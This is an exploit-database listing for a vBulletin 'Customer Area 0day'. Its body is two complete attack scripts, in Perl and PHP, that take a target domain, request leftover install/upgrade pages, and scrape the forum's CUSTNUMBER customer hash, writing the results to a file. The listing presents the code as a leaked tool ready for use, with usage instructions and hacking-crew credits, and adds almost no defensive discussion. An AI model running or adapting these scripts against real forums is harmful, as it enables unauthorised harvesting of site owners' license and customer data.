vBulletin x.x.x Customer Area 0day

2013.03.22
Credit: Anonymous
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

vBulletin x.x.x Customer Area 0day ------------------------------------------------- vBulletin x.x.x Customer Area 0day Perl script got leaked so decided to post the perl script here Code: #!/usr/bin/perl use LWP::UserAgent; use HTTP::Request::Common; system('cls'); system('title vBulletin Install Auto Exploiter'); print "\n ---------------------------------------"; print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n"; print " ---------------------------------------\n"; print " + d4tabase.com -+- d4tabase.com + "; print "\n ---------------------------------------\n"; print " coded by n0tch shoutz d4tabase crew "; print "\n ---------------------------------------\n"; if($#ARGV == -1 or $#ARGV > 0) { print "\n usage: ./vBulletin.pl domain (without http://) \n\n"; exit; } $domain = $ARGV[0]; $install_dir = "install"; $full_domain = "http://$domain/$install_dir/upgrade.php"; chop($domain); &search; sub search { $url = $full_domain; $lwp = LWP::UserAgent->new(); $lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8"); $request = $lwp->post($url, ["searchHash" => "Search"]); print " Searching $domain ----\n "; if ($request->content =~ /CUSTNUMBER = \"(.+)\";/) { print "Result : $1\n"; } else { print "Hash: Hash not found!\n"; } } php exploit - -------------------- <?php set_time_limit(0); if($argc < 2) { echo "Usage: {$argv[0]} http://site.ru/forum" . PHP_EOL; exit; } $URL = $argv[1]; $arr = parse_url($URL); ### work with url if(strpos($URL, '?')) die("Ohh, your URL is not valid"); if(substr($URL, -1, 1) != '/') $URL = $URL . '/'; if(!$arr['scheme']) $URL = 'http://' . $URL; $headers = get_headers($URL . '/install/upgrade.php'); if(substr($headers[0], 9, 3) == '200') { $source = file_get_contents($URL . "/install/upgrade.php"); } elseif($headers = get_headers($URL . '/install/finalupgrage.php')) { if(substr($headers[0], 9, 3) == '200') $source = file_get_contents($URL . "/install/finalupgrage.php"); } else die("something went wrong..."); preg_match_all('|var CUSTNUMBER = "(.*?)";|', $source, $res); foreach ($res[1] as $hash) { echo "Hash: " . $hash . PHP_EOL; $fp = fopen("hash.txt", "a+"); fwrite($fp, $hash . PHP_EOL); } ?>

References:

http://pastebin.com/5hgWHFbj


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top